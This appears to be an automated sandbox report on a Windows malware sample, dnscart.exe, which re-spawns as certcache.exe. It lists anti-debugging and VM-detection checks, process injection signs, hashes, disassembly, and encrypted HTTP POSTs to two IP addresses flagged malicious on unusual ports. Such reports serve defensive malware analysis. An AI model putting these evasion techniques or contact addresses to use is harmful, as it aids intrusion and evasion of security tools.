Source: dnscart.exe	Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameFXSRESM.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenametaskeng.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameWsdMon.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamevsstrace.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameWLDAP32.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamenetprofm.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameThemeUI.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameExplorerFrame.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameesrb.dll.muiH vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamexpsrchvw.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamestobject.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamerasdlg.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameAltTab.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewscui.cpl.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameHCPROVIDERS.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameSearchIndexer.exe.mui@ vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamePNIDUI.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenametquery.dll.mui@ vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameesent.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamesidebar.EXE.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameMsMpRes.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenametwext.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamempr.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameschedsvc.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameFDResPub.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameFunDisc.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamerpcrt4.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameFDPrint.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameBASEBRD.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameimageres.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameWINMM.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameDocumentPerformanceEvents.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameWerConCpl.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameMSHTML.DLL.MUIV vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameSHSVCS.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenametaskmgr.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameSndVolSSO.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewin32spl.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameinetpp.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameadvapi32.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameprovsvc.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameIEFRAME.DLL.MUIV vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamep2pcollab.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameQAgentRT.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameDhcpQEC.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamenlasvc.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamenapinsp.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamepnrpnsp.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameFVEUI.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamews2_32.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameiphlpapi.dll.muij% vs dnscart.exe

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Users\user\Desktop\dnscart.exe	Process created: C:\Users\user\Desktop\dnscart.exe C:\Users\user\Desktop\dnscart.exe
Source: C:\Windows\SysWOW64\certcache.exe	Process created: C:\Windows\SysWOW64\certcache.exe C:\Windows\SysWOW64\certcache.exe

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Users\user\Desktop\dnscart.exe

System information queried: KernelDebuggerInformation

Checks if the current process is being debugged

Show sources

Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort

Contains functionality to read the PEB

Show sources

Source: C:\Users\user\Desktop\dnscart.exe	Code function: 1_2_001F1BE0 mov eax, dword ptr fs:[00000030h]	1_2_001F1BE0
Source: C:\Users\user\Desktop\dnscart.exe	Code function: 2_2_00221BE0 mov eax, dword ptr fs:[00000030h]	2_2_00221BE0
Source: C:\Windows\SysWOW64\certcache.exe	Code function: 3_2_001A1BE0 mov eax, dword ptr fs:[00000030h]	3_2_001A1BE0
Source: C:\Windows\SysWOW64\certcache.exe	Code function: 4_2_00131BE0 mov eax, dword ptr fs:[00000030h]	4_2_00131BE0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Users\user\Desktop\dnscart.exe

Code function: 1_2_001E2088 GetLastError,GetProcessHeap,RtlAllocateHeap,lstrcmp,GetProcessHeap,HeapFree,SetLastError,GetCurrentProcess,GetLastError,wsprintfA,SetLastError,GetCurrentProcessId,

1_2_001E2088

Malware Analysis System Evasion:

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: sppsvc.exe	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: sppsvc.exe	Binary or memory string: SCSI\DISK&VEN_VMWARE_&PROD_VMWARE_VIRTUAL_S\5&22BE343F&0&000000

Program exit points

Show sources

Source: C:\Windows\SysWOW64\certcache.exe	API call chain: ExitProcess graph end node			graph_4-6574
Source: C:\Windows\SysWOW64\certcache.exe	API call chain: ExitProcess graph end node			graph_4-6648

Queries a list of all running processes

Show sources

Source: C:\Windows\SysWOW64\certcache.exe

Process information queried: ProcessInformation

Checks the free space of harddrives

Show sources

Source: C:\Users\user\Desktop\dnscart.exe

File Volume queried: C:\ FullSizeInformation

Contains functionality to enumerate running services

Show sources

Source: C:\Users\user\Desktop\dnscart.exe	Code function: EnumServicesStatusExW,OpenServiceW,	2_2_0022985F
Source: C:\Users\user\Desktop\dnscart.exe	Code function: EnumServicesStatusExW,GetLastError,	2_2_002297F3
Source: C:\Windows\SysWOW64\certcache.exe	Code function: EnumServicesStatusExW,OpenServiceW,	4_2_0013985F
Source: C:\Windows\SysWOW64\certcache.exe	Code function: EnumServicesStatusExW,GetLastError,	4_2_001397F3

Found large amount of non-executed APIs

Show sources

Source: C:\Users\user\Desktop\dnscart.exe	API coverage: 6.2 %
Source: C:\Windows\SysWOW64\certcache.exe	API coverage: 5.1 %

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Users\user\Desktop\dnscart.exe TID: 2284	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\SysWOW64\certcache.exe TID: 2700	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\wbem\WmiApSrv.exe TID: 2576	Thread sleep time: -120000s >= -60000s

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49158 -> 4143
Source: unknown	Network traffic detected: HTTP traffic on port 49159 -> 7080

Language, Device and Operating System Detection:

Contains functionality to query windows version

Show sources

Source: C:\Users\user\Desktop\dnscart.exe

Code function: 1_2_001F8DA0 RtlGetVersion,GetNativeSystemInfo,

1_2_001F8DA0

Queries the cryptographic machine GUID

Show sources

Source: C:\Users\user\Desktop\dnscart.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Users\user\Desktop\dnscart.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\certcache.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\Fonts\modern.fon VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\Fonts\roman.fon VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\Fonts\script.fon VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\Fonts\coure.fon VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\Fonts\serife.fon VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\Fonts\sserife.fon VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\Fonts\smalle.fon VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\Fonts\smallf.fon VolumeInformation

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious

Simulations

Behavior and APIs

Time	Type	Description
21:07:28	API Interceptor	1x Sleep call for process: dnscart.exe modified from: 60000ms to: 1000ms
21:07:46	API Interceptor	1x Sleep call for process: certcache.exe modified from: 60000ms to: 1000ms
21:09:25	API Interceptor	2x Sleep call for process: WmiApSrv.exe modified from: 60000ms to: 1000ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot

Startup

System is w7x64_hvm

dnscart.exe (PID: 2264 cmdline: 'C:\Users\user\Desktop\dnscart.exe' MD5: A992758B24FBB2A2E330558FB14A6DC7)

dnscart.exe (PID: 1844 cmdline: C:\Users\user\Desktop\dnscart.exe MD5: A992758B24FBB2A2E330558FB14A6DC7)

certcache.exe (PID: 2072 cmdline: C:\Windows\SysWOW64\certcache.exe MD5: A992758B24FBB2A2E330558FB14A6DC7)

certcache.exe (PID: 2280 cmdline: C:\Windows\SysWOW64\certcache.exe MD5: A992758B24FBB2A2E330558FB14A6DC7)

mscorsvw.exe (PID: 2756 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe MD5: BD2AE15EFB47E5215B4D0C59EA00C91A)

mscorsvw.exe (PID: 2792 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe MD5: 30EAABE7A3B1081B6F5DDE4A1C0305D2)

svchost.exe (PID: 2828 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation MD5: C78655BC80301D76ED4FEF1C1EA40A7D)

sppsvc.exe (PID: 2868 cmdline: C:\Windows\system32\sppsvc.exe MD5: E17E0188BB90FAE42D83E98707EFA59C)

WmiApSrv.exe (PID: 2660 cmdline: C:\Windows\system32\wbem\WmiApSrv.exe MD5: 38B84C94C5A8AF291ADFEA478AE54F93)

cleanup

Created / dropped Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen_service.log
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	226
Entropy (8bit):	5.130289465463955
Encrypted:	false
MD5:	CF2DEA91A22FC52CE0F9E2CF3B0CB9BF
SHA1:	7A78451A76E7001D4C3E412BD0708E9FDFF71F85
SHA-256:	112B30C10E443383895E4157D6DEA738761EC3D748D68F4A76A3A577E722CC45
SHA-512:	58D0D41077A759C7F7B05B1F6742B770A790B01DB4DE92474B67523C4EDF503C5891545C3AEE25365FF54BE098796756318B4D1BD832DB86C12E0DB37131D999
Malicious:	false
Reputation:	low

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	ASN	ASN Name	Malicious
69.16.193.12	United States	32244	LIQUID-WEB-INC-LiquidWebLLCUS	true
192.168.2.255	unknown	unknown	unknown	false
178.32.255.132	France	16276	OVHFR	true

Static File Info

General
File type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):	6.65101379539173
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Java Script embedded in Visual Basic Script (1500/0) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	dnscart.exe
File size:	135168
MD5:	a992758b24fbb2a2e330558fb14a6dc7
SHA1:	701dd982ee1486bdb13fcd92a2f1c43d199b2a07
SHA256:	2aba6e10f053484b005015107dd48b71ec1b7c9f70e0e6acfb70506852047a49
SHA512:	dfc4165078802657ad8a9a997c080726cd8dee4d713098c7660ee1ff0595d282b9530a873f6e370b0423fc8d95f6a837480f71cc6fb903a6581ac2669753f266
File Content Preview:	MZ......................@.......................................7...g!. be ........!..L.!ThrL. undern32.un!..$MZ......r...i..am must.This pro W.........PE..L...OLTZ.....................P......0.............@.......................... ............@........

File Icon

Static PE Info

General
Entrypoint:	0x41ad30
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5A544C4F [Tue Jan 09 04:59:59 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	816577adfff786c2b1d567c9184dd0f8

Entrypoint Preview

Instruction
mov eax, dword ptr [0041D3D8h]
mov eax, dword ptr [eax]
push eax
comiss xmm0, xmm0
pop eax
mov dword ptr [0041D3C0h], eax
mov dword ptr [0041D3C4h], eax
mov eax, dword ptr [esp+04h]
sub eax, 00000000h
add eax, 04h
je 0C914D35h
sub eax, 04h
mov dword ptr [0041D3C0h], esi
mov dword ptr [0041D3C4h], edi
mov dword ptr [0041D3D0h], esp
mov dword ptr [0041D3CCh], ebp
mov dword ptr [0041D3C8h], ebx
jmp 0C8FB44Dh
int3
mov dword ptr [ebp-04h], eax
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push ebx
push edi
and esp, FFFFFFF8h
sub esp, 18h
lea eax, dword ptr [0041D000h]
mov ecx, dword ptr [esp+08h]
mov edx, dword ptr [esp+0Ch]
mov ebx, ecx
mov dword ptr [esp+04h], ecx
mov cl, bl
mov esi, edx
shr esi, cl
mov cl, bl
mov edi, dword ptr [esp+04h]
shrd edi, edx, cl
xor edx, edx
test bl, 00000020h
cmovne edi, esi
cmovne esi, edx
mov dword ptr [esp+0Ch], esi
mov dword ptr [esp+08h], edi
lea esp, dword ptr [ebp-0Ch]
pop edi
pop ebx
pop esi
pop ebp
ret
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push ebx
push edi
push esi
and esp, FFFFFFF8h
sub esp, 30h
mov eax, dword ptr [ebp+08h]
mov ecx, dword ptr [esp+20h]
mov edx, dword ptr [esp+24h]
mov esi, ecx
add esi, EB938CA7h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f278	0xb5	6xOsN5y
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x20000	0x518	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x21000	0x1e0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1f050	0x38	6xOsN5y
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1f000	0x50	6xOsN5y
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1b3b8	0x1c000	False	0.597673688616	ump; data	7.10790918737	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x1d000	0x13e8	0x1000	False	0.088134765625	ump; data	1.61918201861	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
6xOsN5y	0x1f000	0x4c4	0x1000	False	0.177734375	ump; data	1.74778543372	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x20000	0x518	0x1000	False	0.155517578125	ump; data	2.07164982127	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x21000	0x1e0	0x1000	False	0.109619140625	ump; data	1.09843051317	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x200a0	0x178	ump; VAX COFF executable not stripped - version 79	English	United States
RT_MANIFEST	0x20218	0x2fa	ump; ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
SETUPAPI.dll	SetupDiGetDeviceInterfaceDetailA
POWRPROF.dll	IsPwrSuspendAllowed, IsPwrShutdownAllowed
GDI32.dll	CreateDIBitmap
KERNEL32.dll	AreFileApisANSI, SetFileApisToOEM, HeapSize, SetFileApisToANSI
WS2_32.dll	WSACleanup
SHELL32.dll	DragAcceptFiles
pdh.dll	PdhUpdateLogW
RPCRT4.dll	RpcAsyncInitializeHandle

Version Infos

Description	Data
ProductVersion	2.1.24
FileVersion	2.1.24
ProductName	cyrus-sasl
Translation	0x0400 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 23, 2018 21:08:29.141274929 MEZ	49158	4143	192.168.2.2	69.16.193.12
Jan 23, 2018 21:08:29.141295910 MEZ	4143	49158	69.16.193.12	192.168.2.2
Jan 23, 2018 21:08:29.141455889 MEZ	49158	4143	192.168.2.2	69.16.193.12
Jan 23, 2018 21:08:29.142405033 MEZ	49158	4143	192.168.2.2	69.16.193.12
Jan 23, 2018 21:08:29.142414093 MEZ	4143	49158	69.16.193.12	192.168.2.2
Jan 23, 2018 21:08:59.697390079 MEZ	49158	4143	192.168.2.2	69.16.193.12
Jan 23, 2018 21:08:59.697458982 MEZ	4143	49158	69.16.193.12	192.168.2.2
Jan 23, 2018 21:08:59.697585106 MEZ	49158	4143	192.168.2.2	69.16.193.12
Jan 23, 2018 21:09:30.821098089 MEZ	49159	7080	192.168.2.2	178.32.255.132
Jan 23, 2018 21:09:30.821119070 MEZ	7080	49159	178.32.255.132	192.168.2.2
Jan 23, 2018 21:09:30.821271896 MEZ	49159	7080	192.168.2.2	178.32.255.132
Jan 23, 2018 21:09:30.822360992 MEZ	49159	7080	192.168.2.2	178.32.255.132
Jan 23, 2018 21:09:30.822371006 MEZ	7080	49159	178.32.255.132	192.168.2.2
Jan 23, 2018 21:10:01.382885933 MEZ	49159	7080	192.168.2.2	178.32.255.132
Jan 23, 2018 21:10:01.382961988 MEZ	7080	49159	178.32.255.132	192.168.2.2
Jan 23, 2018 21:10:01.383083105 MEZ	49159	7080	192.168.2.2	178.32.255.132

HTTP Request Dependency Graph

69.16.193.12:4143

178.32.255.132:7080

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.2	49158	69.16.193.12	4143	C:\Windows\SysWOW64\certcache.exe

Timestamp	kBytes transferred	Direction	Data
Jan 23, 2018 21:08:29.142405033 MEZ	0	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 69.16.193.12:4143 Content-Length: 308 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 05 2b f7 5b e4 e5 98 1e 24 6e 6a 13 43 d7 1c ef dc 05 87 f3 14 9c 42 81 af 2b 78 ee 2c c5 67 27 99 36 95 3e d3 40 38 4c 3d 39 4e 44 7a 18 44 d1 32 f6 9a 86 2d 61 60 0b 9e 95 3a b4 d3 29 8e 40 57 82 6a d0 91 62 4a d1 83 f1 52 b2 ea 6e 7e 7f e1 b8 9c 3e c3 ed c3 5d af a9 8b 6c 23 2e df 14 6c ef c2 5f e7 5f 38 c9 2e ba c3 7c 0c db bd 28 14 7e de 48 1e d8 63 39 22 97 5a 81 a4 c8 a1 74 eb d3 74 6b ae 5d df 8e f0 72 0b 9a bf e0 ea 18 98 2e 9e 5a 78 d2 ef 27 62 ba b7 31 0d 3c 07 c9 9c 9a 45 15 f5 fb 20 b2 54 33 70 c8 1f f2 51 96 51 76 8d 6d f9 db 50 b6 93 c2 8e cd 63 2a 6a 81 0a 2f 85 8a 20 12 72 88 51 75 d0 26 33 57 24 19 af d3 8a d2 04 7a f3 2b 45 ca 0e bb bd 83 f7 79 cf fc 37 51 e7 27 c1 c3 e4 02 d4 23 9c fd ea a1 83 b9 24 e5 e3 bc 9e 3f 2b 0c 26 85 94 39 c0 75 9c 16 b8 5c 13 ec 20 38 bc 70 85 82 04 4a 42 35 4b 42 52 a4 16 d8 ca c5 d4 07 86 3b da 34 00 39 35 75 7e 53 1b 05 5a a3 26 7b cd 48 16 5d 91 72 4c b6 a6 20 Data Ascii: +[$njCB+x,g'6>@8L=9NDzD2-a`:)@WjbJRn~>]l#.l__8.\|(~Hc9"Zttk]r.Zx'b1<E T3pQQvmPc*j/ rQu&3W$z+Ey7Q'#$?+&9u\ 8pJB5KBR;495u~SZ&{H]rL

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.2	49159	178.32.255.132	7080	C:\Windows\SysWOW64\certcache.exe

Timestamp	kBytes transferred	Direction	Data
Jan 23, 2018 21:09:30.822360992 MEZ	2	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 178.32.255.132:7080 Content-Length: 308 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 95 73 06 ac 88 ab 6d 88 1c 42 8b 42 cc fe 00 d8 b2 75 14 4f 5e 86 02 fb e1 ee 3c ac eb ad bd 9c a7 a9 2f 7d 11 2b 58 78 52 fb c0 9a 7d 6d 86 ed f1 e4 b5 49 16 26 4d 18 e6 56 39 2a 6d b6 0a 29 8a 5c fc 58 bd de f7 ef df 89 c0 35 9c a5 ea 14 c7 e3 31 55 cd 15 41 f7 b0 a5 11 2c eb 9e f3 ec 26 7a d3 9b bb 09 89 f4 a6 8e 67 8f 41 55 b5 90 b8 25 69 18 54 86 d2 24 7a 3d c2 0d 20 f6 a1 1a 68 47 09 78 33 21 ea 2e e1 62 dd e8 1b e8 7f 18 be cb 9b 0c 90 4a f3 11 45 b6 43 8e 2b 93 b7 82 76 af df fb b3 95 9e 81 b1 de 43 27 d1 b0 f6 9e 85 a8 b5 27 dc ec 3e bf 18 15 f5 26 3f 37 26 69 58 fa ea 53 c2 b9 64 e2 55 d6 ac 08 c1 14 66 cd 82 97 a2 1a 5c b9 b1 5d 0a fc 0c 38 82 f2 17 30 81 16 27 e4 11 75 c1 3e 44 fc 39 91 01 8e a5 17 d8 56 db a7 61 02 ae 81 5e 8c ba 2e ea bb 3f d1 6c 5b aa 95 18 69 56 a9 4f 87 f2 b9 64 8c f1 82 8f ae b0 5e 07 e0 52 81 0e 88 e0 22 31 1e f9 c5 d4 c2 a4 10 c9 b2 6c f9 16 e0 c0 2d 9e 17 85 e4 a6 8a a0 c3 Data Ascii: smBBuO^</}+XxR}mI&MV9*m)\X51UA,&zgAU%iT$z= hGx3!.bJEC+vC''>&?7&iXSdUf\]80'u>D9Va^.?l[iVOd^R"1l-

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: dnscart.exe PID: 2264 Parent PID: 2992

General

Start time:	21:07:17
Start date:	23/01/2018
Path:	C:\Users\user\Desktop\dnscart.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\dnscart.exe'
Imagebase:	0xa10000
File size:	135168 bytes
MD5 hash:	A992758B24FBB2A2E330558FB14A6DC7
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: dnscart.exe PID: 1844 Parent PID: 2264

General

Start time:	21:07:19
Start date:	23/01/2018
Path:	C:\Users\user\Desktop\dnscart.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\dnscart.exe
Imagebase:	0xa10000
File size:	135168 bytes
MD5 hash:	A992758B24FBB2A2E330558FB14A6DC7
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: certcache.exe PID: 2072 Parent PID: 448

General

Start time:	21:07:28
Start date:	23/01/2018
Path:	C:\Windows\SysWOW64\certcache.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\certcache.exe
Imagebase:	0xa10000
File size:	135168 bytes
MD5 hash:	A992758B24FBB2A2E330558FB14A6DC7
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: certcache.exe PID: 2280 Parent PID: 2072

General

Start time:	21:07:30
Start date:	23/01/2018
Path:	C:\Windows\SysWOW64\certcache.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\certcache.exe
Imagebase:	0xa10000
File size:	135168 bytes
MD5 hash:	A992758B24FBB2A2E330558FB14A6DC7
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: mscorsvw.exe PID: 2756 Parent PID: 448

General

Start time:	21:08:45
Start date:	23/01/2018
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Imagebase:	0x170000
File size:	107192 bytes
MD5 hash:	BD2AE15EFB47E5215B4D0C59EA00C91A
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

